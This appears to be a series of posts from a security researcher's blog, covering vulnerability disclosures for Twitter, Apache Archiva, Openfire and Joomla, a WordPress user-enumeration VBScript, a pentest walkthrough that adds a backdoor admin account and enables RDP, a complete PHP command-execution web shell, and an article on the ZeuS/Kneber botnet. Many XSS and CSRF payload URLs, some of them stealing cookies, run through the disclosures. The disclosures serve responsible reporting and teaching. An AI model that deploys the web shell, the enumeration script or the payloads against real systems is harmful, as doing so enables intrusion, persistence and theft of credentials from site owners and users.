An attacker could take advantage of the absence of any security tokens (CSRF tokens) that would allow the server to authenticate the request and setup a page (and host it on xyz.com/index.html) similar to the following:

<html>
<body>
<img src="https://mobile.twitter.com/settings/wipe_addressbook" width="0" height="0" />
</body>
</html>

An attacker could then be made to navigate to xyz.com/index.html (via email or some other means) and his address book would be deleted!

The form that would make the final request has now been protected with a 'authenticity_token' which is random and changes on every login and without which the request is not processed on the server. An attacker would need to know this value to attack the application via CSRF.

This was my ticket to the Twitter Hall of Fame for Security researchers at http://twitter.com/about/security!

Installing Aircrack-ng on Ubuntu 12.04

2012-04-15T11:11:00.000-07:00

One of the primary reasons I use Ubuntu is to crack wireless networks whenever I get the opportunity. I recently moved to Ubuntu 12.04 and found that aircrack-ng was NOT in the repository.

In the process of compiling aircrack-ng from source, I hit a lot of errors mostly to do with a variable called -Werror. This is what you need to do to compile aircrack-ng without the pesky errors.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

In the aircrack-ng-1.1 directory there is a file called common.mak, use your favorite editor to open the file and scroll down till you see the following line:

CFLAGS ?= -g -W -Wall -Werror -O3

Delete the -Werror variable, so that the line now looks like the following. Save and exit.

CFLAGS ?= -g -W -Wall -O3

Run make and make install to get aircrack-ng up and running.

C0C0N 2011 - CTF Walkthrough

2011-10-16T11:30:00.001-07:00

I won the recently concluded C0C0N Capture the Flag event at the conference. Here's the walkthrough for all the levels on slideshare.

C0c0n 2011 CTF Walkthrough

View more documents from riyazwalikar

Enable RDP via Command line

2011-08-17T18:16:00.000-07:00

Been extremely busy with loads of work. Anyways, here's something interesting that I needed to do recently at a customer network to gain access to a server.

I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The Application was running of XAMPP under an administrative accounts, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here's what I did:

1. Created a user and added it to the local administrators group using these commands:

net user newadmin newpa$$w0rd /add

net localgroup administrators newadmin /add

net user newadmin

2. Used the following commands to enable Remote Desktop and logged in with my credentials:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

/v fDenyTSConnections /t REG_DWORD /d 0 /f



netsh firewall set portopening TCP 3389

3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.

Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.

Happy Hacking!

Apache Archiva Multiple XSS & CSRF Vulnerabilities

2011-05-30T04:10:00.000-07:00

I am honestly surprised at the frequency and places one would find threats like Cross Site Scripting and Cross Site Request Forgery. Although immensely easy to locate and exploit, it can get quite twisted to fix these issues in large applications. Here's a rundown on another product that was found vulnerable. As part of the vulnerability research that I do with published web applications, I downloaded a copy of Apache's Archiva 1.3.4 which was the latest published edition on the vendor's website. Upon examination, there seemed to be several issues with the application that I reported responsibly to the vendor and co-operated in responsible disclosure. Since the cat is now out of the bag, here's the condensed disclosure document with the exploit code intact.

Title: Multiple XSS & CSRF Vulnerabilities in Apache Archiva 1.3.4
--------------------------------------------------------------------

Project: Apache Archiva
Severity: High
Versions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2 are also affected.
Exploit type: Multiple XSS & CSRF
Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5
Vendor URL: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077, CVE-2011-1026
--------------------------------------------------------------------

Timeline:
28 February 2011: Vendor Contacted
1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues Assigned.
7 March 2011: CVE-2011-1077 Assigned for XSS Issues.
14 March 2011: Fixes released to selected channels / Found to be insufficient
27 May 2011: Vendor releases v1.3.5
27 May 2011: Vendor releases security disclosure to Bugtraq and FD.
30 May 2011: Exploit details released on Bugtraq & FD
--------------------------------------------------------------------

Product Description:
Apache Archiva is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT.

Archiva offers several capabilities, amongst which remote repository proxying, security access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning functionality... and many more!
(Source: http://archiva.apache.org/)
--------------------------------------------------------------------

Vulnerability Details:
XSS: User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

CSRF: These issues allow an attacker to access and use the application with the session of a logged on user. In this case if an administrative account is exploited, total application compromise may be acheived.
An attacker can build a simple html page containing a hidden Image tag (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator to access the page.
----------------------------------------------------------------------

Proof of Concept:
Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22><script>alert('xss')</script>
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1<script>alert('xss')</script>&artifactId=1<script>alert('xss')</script>&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test<script>alert('xss')</script>&groupId=test<script>alert('xss')</script>&artifactId=test<script>alert('xss')</script>&version=test<script>alert('xss')</script>&classifier=test<script>alert('xss')</script>&type=test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test<script>alert('xss')</script>

Persistant (Stored) XSS:
Exploit code: test<script>alert('xss')</script>
http://127.0.0.1:8080/archiva/admin/addRepository.action (Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=

http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action

http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action

http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action (Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

CSRF:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen/jars/jaxen-1.0-FCS-full.jar
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed
---------------------------------------------------------------------

Please update to Archiva 1.3.5, available for download via the vendor's website.

WordPress UserId & Username Enumeration Exploit/PoC Script

2011-05-29T07:23:00.000-07:00

On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.

'Author: karniv0re@null.co.in
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by
'querying the value of the parameter 'author' using xmlHTTP.

Dim url, sQuery, args, i, max

if wscript.arguments.count < 1 then
wscript.echo "WPEnum - WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo "Insufficient Parameters."
wscript.echo
wscript.echo "cscript WPEnum.vbs <url> [<max_users>]"
wscript.echo "<url>: A WordPress based website in the form of http://site/"
wscript.echo "<max_users>:[Optional] Maximum number of users. Default 20."
wscript.echo "Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10"
wscript.echo
wscript.quit
End if

set args = wscript.Arguments

wscript.echo "WPEnum - WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo
wscript.echo "Enumerating ..."
wscript.echo

i=0
max=20
url = args(0)
if right(url,1)<> "/" then
url = url & "/"
End if

if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
max=args(1)
End if

Set xmlHTTP = Nothing
set xmlHTTP = CreateObject("Microsoft.XmlHttp")

For i=1 to max
sQuery = args(0) & "?author=" & i
xmlHTTP.open "GET", sQuery, false
xmlHTTP.send ""

wscript.sleep 70

do while not xmlHTTP.readyState=4
Loop

if xmlHTTP.status = 404 then
wscript.echo
i=i-1
wscript.echo i & " users enumerated."
wscript.echo "Done!"
Set xmlHTTP = Nothing
wscript. quit
End if

wscript.echo "Userid:" & i

k = Instr(Lcase(xmlHTTP.responseText),"<title>")
j = Instr(Lcase(xmlHTTP.responseText),"</title>")
username = Mid(xmlHTTP.responseText, k+7, j-k-7)
wscript.echo username
wscript.echo
Next

wscript.echo i & " users enumerated."
wscript.echo "Done!"

Set xmlHTTP = Nothing

'End of program

Simple PHP Web Application Backdoor

2011-03-19T16:35:00.000-07:00

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application's home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here's the code:


<html>
<head>
<title>
simple php shell PoC - karniv0re
</title>
</head>
<body>
<h2>System Info</h2>
<pre>
<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>
</pre>
<br />
<form method="post">
<input type="text" name="cmd">
<input type="submit" value="Execute!">
<br />
<h2>Command Output</h2>
<pre>
<?php
if(isset($_POST['cmd'])){
 $cmd = $_POST['cmd'];
 if (strlen($cmd)==0){
 $cmd = "true";
 }
 system($cmd);
 die;
}
?>
</pre>
</body>
</html>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!

Multiple XSS and XSRF issues in Openfire 3.6.4

2011-02-15T23:56:00.000-08:00

I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/

The following is the condensed disclosure document for the vulnerabilities.:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
--------------------------------------------------------------------

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
--------------------------------------------------------------------

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update recevied. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
--------------------------------------------------------------------

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
--------------------------------------------------------------------

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

---------------------------------------------------------------------

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
----------------------------------------------------------------------

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

http://target-url/group-delete.jsp?group=<script>alert('xss')</script>

http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions

Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script>
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.

CSRF:
For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update>

---------------------------------------------------------------------

Multiple Joomla! XSS Vulnerabilities - CVE-2010-1649

2010-06-11T02:56:00.000-07:00

Last month, while doing some tests on a Joomla! installation on my home computer, I came across a very glaring security issue. The Joomla! admin module has several components that are used to manage the site and its users. Several of these components have a search text box that allows users to search through the list of entities displayed. For example the search box in com_users component allows searching the list of users displayed. The issue was with the search boxes not sanitizing user input. That meant you could enter HTML text in the boxes and it would be rendered and displayed! That is exactly the cause of the world's most common web application vulnerability, Cross Site Scripting or more commonly known as XSS.

This should help beginners understand XSS.
http://en.wikipedia.org/wiki/Cross-site_scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigation implemented by the site's owner.

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Cross Site Scripting can be divided into 2 classes. Persistent and Non-Persistent. The following exploit examples should make things clearer:

Examples taken from Wikipedia.

Non-persistent:

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.
4. Alice visits the URL provided by Mallory while logged into Bob's website.
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.

Persistent attack:

1. Mallory posts a message with malicious payload to a social network.
2. When Bob reads the message, Mallory's XSS steals Bob's cookie.
3. Mallory can now hijack Bob's session and impersonate Bob.

All versions of Joomla! prior to 1.5.18 are vulnerable to an XSS injection attack in the admin module. The following are the vulnerabaility details and exploit code.

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html

Vulnerability Details:

User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability arises due to the administrator core components failing to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result in, but not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

An attacker can send a link with the exploit to an administrator whose access could compromise the application. The following PoC is
available:

http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E

http://joomlasite/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

http://joomlasite/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

CONFIRM URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html
BID: 40444 - http://www.securityfocus.com/bid/40444
CVE-2010-1649: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1649
Secunia: 39964: http://secunia.com/advisories/39964
OSVDB: 65011: http://www.osvdb.org/65011

Please update your installation of Joomla! to the latest available stable release, which at the time of writing was 1.5.18.

The Kneber Botnet

2010-02-22T01:54:00.000-08:00

The term Botnet is used to refer to a collection of software robots or bots which are automated applications that infect multiple, possibly geographically disbursed, computers. These infected computers can then be controlled remotely via a central Control and Command Center (C&C) which the Botnet herder sets up. Botnets are used in underground criminal activities to steal credit card information, perform Distributed Denial of Service attacks, creation or misuse of SMTP mail relays for spam, click fraud, spamdexing and the theft of application serial numbers and login IDs of personal banking accounts and online mail accounts.

While the term "botnet" can be used to refer to any group of bots, such as IRC bots, this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure. This setup is remotely controlled by a Bot herder, also called as Bot master using a C&C via IRC channels or through Web Servers. When a botnet has become sufficiently large, criminals may try to acquire them for undisclosed but large sums of money to gain access to all the data and resulting information from the infected machines and subsequently from the networks associated with them.

The Kneber botnet, discovered by NetWitness, a company that deals with network monitoring and threat analysis solutions, is a new variant of the already massive ZeuS botnet, which has reportedly compromised 75000 machines in 2500 business worldwide. The Kneber botnet is based on the older 1.2 version of ZeuS which is given away for free. ZeuS, also known as Zbot, is readily available to buy in underground forums for as little as 700 USD. The package contains a builder that can generate a bot executable and Web server files (PHP, images, SQL templates) for use as the command and control server. While ZeuS is a generic back door that allows full control by an unauthorized remote user, the primary function of ZeuS is financial gain stealing online credentials such as FTP, email, online banking, and other online passwords via keystroke logging. Zeus' current botnet is estimated to include millions of compromised computers (around 3.6 million in the United States alone). Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, and BusinessWeek.

The Kneber botnet is a relatively small botnet considering the number of compromised computers, although the number of organization and business infected is quite high. The Kneber botnet uses rootkit technologies, undocumented Windows API and other stealth techniques to hide its presence on the infected machine. The Kneber botnet infects only Windows computers and has been known to infect Windows XP Professional SP 2 machines more than any other flavors. The explanation for this could be attributed to the nature in which machines are infected. Computers at the work place can be infected via accesses to sites that cause drive by downloads, URLs of which may be received via spam mails. Also vulnerabilities in the browser (IE 6 and IE 7) and security issues in the OS itself may trigger an infection. No reports of Windows 7 computers being infected have been seen yet possibly due to the use of IE 8 and patching of critical vulnerabilities found in older versions of Windows.

Symptoms of infection may include unexplained bandwidth usage, unknown processes being created, unexplained usage of CPU and memory resources and frequent stalling of applications. The ZeuS botnet is very difficult to detect even with up-to-date antivirus software. Ironically, there are other botnets that have installers made for ZeuS, like the Trojan SpyEye, so that when it affects a computer already infected with ZeuS, it can kick out Zeus and claim the machine for itself. Of course, the computer is still a bot, just with a different Control and Command Center and Bot Herder. The Kneber botnet on the other hand is easily detected and cleaned by most antivirus programs due to its usage of the older version of ZeuS. Egress filtering on traffic at the network perimeter between internal private networks and the Internet may help detect early infection and coupled with active intrusion detection systems may protect organizations and businesses alike. Using virtual keyboards, found on the login pages of most banking applications, or the Microsoft On-Screen Keyboard (osk.exe), when entering sensitive data on even trusted sites, will help protect user identities, financial information and data confidentiality. Common utilities like TCPView, Process Monitor and Process Explorer from Sysinternals (Microsoft) will help identify Network, CPU and Memory congestion factors. It is advisable that businesses continue to train its employees to prevent them from clicking links in emails or on the web, opening malicious attachments while also keeping up with antivirus and operating system updates. Securing the operating system goes in preventing several unrelated issues as well.

The 700MB DVDrip Tutorial

2009-11-20T01:26:00.000-08:00

